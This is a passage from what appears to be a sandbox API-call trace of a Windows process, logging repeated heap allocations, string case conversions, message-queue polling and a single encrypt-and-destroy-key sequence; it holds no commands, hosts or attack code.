[0200.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0200.634] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.634] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0200.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0200.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0200.634] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.634] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.634] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0200.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0200.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0200.635] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0200.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0200.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0200.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.635] CryptEncrypt (in: hKey=0xaa58a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34d3de0*, pdwDataLen=0x8bef68*=0x10dbe, dwBufLen=0x10dc0 | out: pbData=0x34d3de0*, pdwDataLen=0x8bef68*=0x10dc0) returned 1 [0200.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0200.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0200.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0200.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0200.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0200.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0200.637] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0200.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01c0 [0200.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01a0 [0200.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0200.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01b0 [0200.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0200.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0200.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0170 [0200.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0200.637] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.637] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0200.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0200.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0200.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01c0 [0200.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0200.638] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0200.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0200.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0200.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0200.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0200.639] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.639] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0200.639] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0200.639] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0200.639] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0200.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0200.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0200.641] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0200.641] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.641] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0200.641] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0200.642] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0200.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0200.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.642] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0200.642] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.642] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0200.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0200.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.642] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.642] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0200.643] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.643] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0200.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0200.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0200.671] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0200.671] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.671] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0200.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0200.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0200.672] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.672] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.672] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0200.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0200.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.677] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.677] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.677] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0200.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0200.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.681] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0200.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0200.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0200.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0200.682] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0200.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0200.682] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0200.682] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0200.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0200.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0200.682] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0200.682] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.682] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0200.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0200.683] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.683] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0200.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0200.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0200.683] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.683] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0200.683] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0200.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0200.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0200.683] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0200.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0200.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0200.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.684] CryptDestroyKey (hKey=0xaa58a0) returned 1 [0200.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0200.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0200.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0200.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0200.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0200.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0200.684] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0200.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0200.684] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0200.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0200.684] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0200.684] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0200.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0200.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0200.685] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0200.685] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.685] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0200.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0200.685] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0200.685] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0200.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0200.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0200.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0200.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0200.685] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0200.685] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0200.685] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0200.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0200.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0200.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0200.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0200.686] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0200.686] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.686] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.686] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0200.686] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: 